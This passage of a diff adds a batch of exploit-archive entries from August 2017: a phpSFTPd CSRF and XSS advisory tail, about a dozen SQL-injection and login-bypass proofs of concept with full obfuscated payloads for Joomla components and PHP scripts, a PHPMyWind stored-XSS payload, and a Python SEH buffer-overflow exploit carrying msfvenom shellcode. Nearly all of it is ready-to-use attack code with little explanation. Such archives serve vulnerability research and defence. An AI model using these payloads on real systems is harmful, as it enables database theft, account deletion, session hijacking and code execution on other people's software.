+<form action="http://VICTIM-IP/phpsftpd/users.php" method="post">
+<input type="hidden" name="delete" value="Yes">
+<input type="hidden" name="account" value="PWNU">
+<script>//document.forms[2].submit()</script>
+</form>
+
+HTTP Response:
+"The account PWNU was sucesfully deleted"
+
+
+CVE-2017-12971 (XSS)
+
+<form action="http://VICTIM-IP/phpsftpd/users.php" method="post">
+<input type="hidden" name="account" value='"/><script>alert(document.cookie)</script>'>
+<input type="hidden" name="create" value="Create+New+User">
+<script>document.forms[0].submit()</script>
+</form>
+
+
+HTTP Response example:
+"PHPSESSID=HACKED123"
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: "No longer being maintained"
+August 21, 2017  : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
--- a/platforms/php/webapps/42524.txt
+++ b/platforms/php/webapps/42524.txt
@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Joomla! Component Flip Wall 8.0 - SQL Injection
+# Dork: N/A
+# Date: 21.08.2017
+# Vendor Homepage: http://pulseextensions.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/sponsors/flip-wall/
+# Demo: http://demo.pulseextensions.com/flip-wall-component-demo/
+# Version: 8.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?option=com_flipwall&task=click&wallid=[SQL]
+#
+# 811+aND(/*!11166sELeCT*/+0x30783331+/*!11166FrOM*/+(/*!11166SeLeCT*/+cOUNT(*),/*!11166CoNCaT*/((sELEcT(sELECT+/*!11166CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
+#
+# Etc..
+# # # # #
--- a/platforms/php/webapps/42525.txt
+++ b/platforms/php/webapps/42525.txt
@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Joomla! Component Sponsor Wall 8.0 - SQL Injection
+# Dork: N/A
+# Date: 21.08.2017
+# Vendor Homepage: http://pulseextensions.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/sponsors/sponsor-wall/
+# Demo: http://demo.pulseextensions.com/sponsor-wall-component-demo/
+# Version: 8.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?option=com_sponsorwall&task=click&wallid=[SQL]
+#
+# 86+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
+#
+# Etc..
+# # # # #
--- a/platforms/php/webapps/42526.txt
+++ b/platforms/php/webapps/42526.txt
@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: PHP Classifieds Script 5.6.2 SQL Injection
+# Dork: N/A
+# Date: 21.08.2017
+# Vendor Homepage: https://scriptoffice.com/
+# Software Link: https://soft.scriptoffice.com/projects/classifiedscript/wiki/Main_Menu
+# Demo: http://www.classifieddemo.com/
+# Version: 5.6.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/[SQL]/
+# 
+# http://localhost/[PATH]/category/[SQL]/
+# 
+# Etc...
+# # # # #
--- a/platforms/php/webapps/42527.txt
+++ b/platforms/php/webapps/42527.txt
@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Affiliate Niche Script 3.4.0 SQL Injection
+# Dork: N/A
+# Date: 21.08.2017
+# Vendor Homepage: https://scriptoffice.com/
+# Software Link: https://soft.scriptoffice.com/projects/affiliatenichescript/wiki/Main_Menu
+# Demo: http://demodesigns.affiliatenichescript.com/
+# Version: 3.4.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/default_blue/Appliances/Categories/[SQL]/
+# 
+# 1'+uNiOn+sElEct+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x3c48313e494853414e2053454e43414e3c2f48313e,0x283929,0x28313029,0x28313129,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229+--+-/
+#
+# Etc...
+# # # # #
--- a/platforms/php/webapps/42528.txt
+++ b/platforms/php/webapps/42528.txt
@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: PHP Coupon Script 6.0 - 'cid' Parameter SQL Injection
+# Dork: N/A
+# Date: 21.08.2017
+# Vendor Homepage: http://www.couponscript.com/
+# Software Link: http://www.couponscript.com/
+# Demo: http://www.couponscript.com/demo/
+# Version: 6.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?page=cat&cid=[SQL]
+# 
+# 34'+/*!00000Procedure*/+/*!00000Analyse*/+(extractvalue(0,/*!00000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)--+-
+#
+# Etc...
+# # # # #
--- a/platforms/php/webapps/42529.txt
+++ b/platforms/php/webapps/42529.txt
@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: iTech Social Networking Script 3.08 - SQL Injection
+# Dork: N/A
+# Date: 21.08.2017
+# Vendor Homepage: http://itechscripts.com/
+# Software Link: http://itechscripts.com/social-networking-script/
+# Demo: http://social.itechscripts.com
+# Version: 3.08
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows the users to inject sql commands ...
+#
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/timeline.php?token=[SQL]
+# 
+# -5458c74d97b01eae257e44aa9d5bade97baf'++uNiOn+sElEct+(/*!00000SeLect*/(@x)/*!00000fRom*/(/*!00000select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!00000select*/(0)/*!00000from*/(information_schema.columns)/*!00000where*/(table_schema=database())and(0x00)in(@x:=/*!00000CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!00000CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629+--+-
+#
+# http://localhost/[PATH]/photos_of_you.php?token=[SQL]
+#
+# Etc...
+# # # # #
--- a/platforms/php/webapps/42530.txt
+++ b/platforms/php/webapps/42530.txt
@ -0,0 +1,26 @@
+# # # # # 
+# Exploit Title: Joomla! Component FocalPoint Pro / Free v1.2.3 - SQL Injection
+# Dork: N/A
+# Date: 21.08.2017
+# Vendor Homepage: http://focalpointx.com/
+# Software Link: http://focalpointx.com/demos/focalpoint-pro
+# Demo: http://focalpointx.com/demos/focalpoint-free/
+# Demo: http://focalpointx.com/demos/focalpoint-pro
+# Version: 1.2.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?option=com_focalpoint&view=location&id=[SQL]
+#
+# Etc..
+# # # # #
--- a/platforms/php/webapps/42531.txt
+++ b/platforms/php/webapps/42531.txt
@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Bitcoin,Dogecoin Mining 1.0 - Authentication Bypass
+# Dork: N/A
+# Date: 21.08.2017
+# Vendor Homepage: https://codecanyon.net/user/bousague
+# Software Link: https://codecanyon.net/item/bitcoindogecoin-mining-php-script/20315581
+# Demo: http://test.z-files.site/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to access the user panel and administration panel ...
+#	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/
+# http://localhost/[PATH]/admincqqq
+# User: anything Pass: 'or 1=1 or ''='
+# 
+# Etc...
+# # # # #
--- a/platforms/php/webapps/42532.txt
+++ b/platforms/php/webapps/42532.txt
@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Joomla! Component Ajax Quiz 1.8 - SQL Injection
+# Dork: N/A
+# Date: 21.08.2017
+# Vendor Homepage: http://webkul.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/ajaxquiz/
+# Demo: http://joomla30.webkul.com/ajaxquiz/
+# Version: 1.8
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?option=com_ajaxquiz&view=ajaxquiz&cid=[SQL]
+# 
+# 60+union+select+(/*!00000SeLect*/(@x)/*!00000fRom*/(/*!00000select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!00000select*/(0)/*!00000from*/(information_schema.columns)/*!00000where*/(table_schema=database())and(0x00)in(@x:=/*!00000CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!00000CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number+1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z+1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)--+-
+#
+# Etc..
+# # # # #
--- a/platforms/php/webapps/42533.txt
+++ b/platforms/php/webapps/42533.txt
@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: PHP-Lance 1.52 - 'subcat' Parameter SQL Injection
+# Dork: N/A
+# Date: 21.08.2017
+# Vendor Homepage: http://www.scriptdemo.com/
+# Software Link: http://www.scriptdemo.com/details/phplance/
+# Demo: http://www.scriptdemo.com/php-lance/
+# Version: 1.52
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/show.php?catid=1&subcat=[SQL]
+#
+# -1'+unIon(SELEct+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,(/*!00000SeLect*/(@x)/*!00000fRom*/(/*!00000select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!00000select*/(0)/*!00000from*/(information_schema.columns)/*!00000where*/(table_schema=database())and(0x00)in(@x:=/*!00000CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!00000CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283929,0x28313029)--+-
+#
+# Etc...
+# # # # #
--- a/platforms/php/webapps/42534.txt
+++ b/platforms/php/webapps/42534.txt
@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: PHP Jokesite 2.0 - 'joke_id' Parameter SQL Injection
+# Dork: N/A
+# Date: 21.08.2017
+# Vendor Homepage: http://www.scriptdemo.com/
+# Software Link: http://www.scriptdemo.com/details/phpjokesite2/
+# Demo: http://www.scriptdemo.com/php-jokesite/ver2.0/
+# Version: 2.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/print.php?joke_id=[SQL]
+#
+# -230'+unIon(SELEct+0x283129,0x283229,0x3c68313e494853414e2053454e43414e3c2f68313e,0x283429,0x283529,(/*!00000SeLect*/(@x)/*!00000fRom*/(/*!00000select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!00000select*/(0)/*!00000from*/(information_schema.columns)/*!00000where*/(table_schema=database())and(0x00)in(@x:=/*!00000CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!00000CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329)--+-
+#
+# Etc...
+# # # # #
--- a/platforms/php/webapps/42535.txt
+++ b/platforms/php/webapps/42535.txt
@ -0,0 +1,68 @@
+Exploit Title：PHPMyWind 5.3 has XSS
+Exploit Author:小雨
+Vendor Homepage:http://phpmywind.com
+Software Link:http://phpmywind.com/downloads/PHPMyWind_5.3.zip
+Version:5.3
+CVE:CVE-2017-12984
+
+
+$r= $dosql->GetOne("SELECT Max(orderid) AS orderid FROM `#@__message`");
+                $orderid= (empty($r['orderid']) ? 1 : ($r['orderid'] + 1));
+                $nickname= htmlspecialchars($nickname);//游客(xxx)
+                $contact= htmlspecialchars($contact); //联系方式
+                $content= htmlspecialchars($content); //留言内容
+                
+                $posttime= GetMkTime(time());
+                $ip= gethostbyname($_SERVER['REMOTE_ADDR']);
+        
+        
+                $sql= "INSERT INTO `#@__message` (siteid, nickname, contact, content, orderid, posttime, htop, rtop, checkinfo, ip) VALUES (1, '$nickname', '$contact', '$content', '$orderid', '$posttime', '', '', 'false', '$ip')";
+                if($dosql->ExecNoneQuery($sql))
+                {
+                        ShowMsg('留言成功，感谢您的支持！','message.php');
+                        exit();
+                }
+        }
+可以看出使用htmlspecialchars进行过滤,带入库中.
+跟进content参数。
+127.0.0.1/PHPMyWind_5.3/admin/ message_update.php
+<?php require_once(dirname(__FILE__).'/inc/config.inc.php');IsModelPriv('message'); ?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<title>修改留言</title>
+<link href="templates/style/admin.css" rel="stylesheet" type="text/css" />
+<script type="text/javascript" src="templates/js/jquery.min.js"></script>
+<script type="text/javascript" src="templates/js/checkf.func.js"></script>
+<script type="text/javascript" src="editor/kindeditor-min.js"></script>
+<script type="text/javascript" src="editor/lang/zh_CN.js"></script>
+</head>
+<body>
+<?php
+$row = $dosql->GetOne("SELECT * FROM `#@__message` WHERE `id`=$id");
+?>
+<div class="formHeader"> <span class="title">修改留言</span> <a href="javascript:location.reload();" class="reload">刷新</a> </div>
+<form name="form" id="form" method="post" action="message_save.php">
+        <table width="100%" border="0" cellspacing="0" cellpadding="0" class="formTable">
+                <tr>
+                        <td width="25%" height="40" align="right">用户名：</td>
+                        <td width="75%"><strong><?php echo $row['nickname'] ?></strong></td>
+                </tr>
+                <tr>
+                        <td height="40" align="right">联系方式：</td>
+                        <td><input type="text" name="contact" id="contact" class="input" value="<?php echo $row['contact'] ?>" /></td>
+                </tr>
+                <tr>
+                        <td height="198" align="right">留言内容：</td>
+                        <td><textarea name="content" id="content"><?php echo $row['content'] ?></textarea>
+                                <script>
+
+
+p:33
+<td><textarea name="content" id="content"><?php echo $row['content'] ?></textarea>
+
+后台直接取出content参数,数据并未进行转义操作。
+
+
+EXP: “><img/src=x onerror=alert(2001)><“‘
--- a/platforms/windows/local/42521.py
+++ b/platforms/windows/local/42521.py
@ -0,0 +1,60 @@
+#!/usr/bin/python
+ 
+###############################################################################
+# Exploit Title:        Easy DVD Creater 2.5.11 - 'Enter User Name' Field Buffer Overflow (SEH)
+# Date:                 19-08-2017
+# Exploit Author:       Anurag Srivastava 
+# Website:		www.pyramidcyber.com
+# Vulnerable Software:  Easy DVD Creater 
+# Vendor Homepage:      http://www.divxtodvd.net/
+# Version:              2.5.11
+# Software Link:        http://www.divxtodvd.net/easy_dvd_creator.exe
+# Tested On:            Windows XP
+#
+# Credit to PYRAMID cYBER AND MR. NIPUN JASWAL
+#
+# To reproduce the exploit:
+#   1. Click Register
+#   2. In the "Enter User Name" field, paste the content of pyramid.txt
+#
+##############################################################################
+ 
+
+buffer = "\x41" * 996
+ 
+nSEH = "\xeb\x10\x90\x90"
+ 
+# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
+SEH = "\x59\x78\x03\x10"
+ 
+badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
+ 
+# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
+buf =  ""
+buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
+buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
+buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
+buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
+buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
+buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
+buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
+buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
+buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
+buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
+buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
+buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
+buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
+buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
+buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
+buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
+buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
+ 
+nops = "\x90" * 16
+ 
+badchars = "\x0a\x0d"
+ 
+data = buffer + nSEH + SEH + nops + buf
+ 
+f = open ("pyramid.txt", "w")
+f.write(data)
+f.close()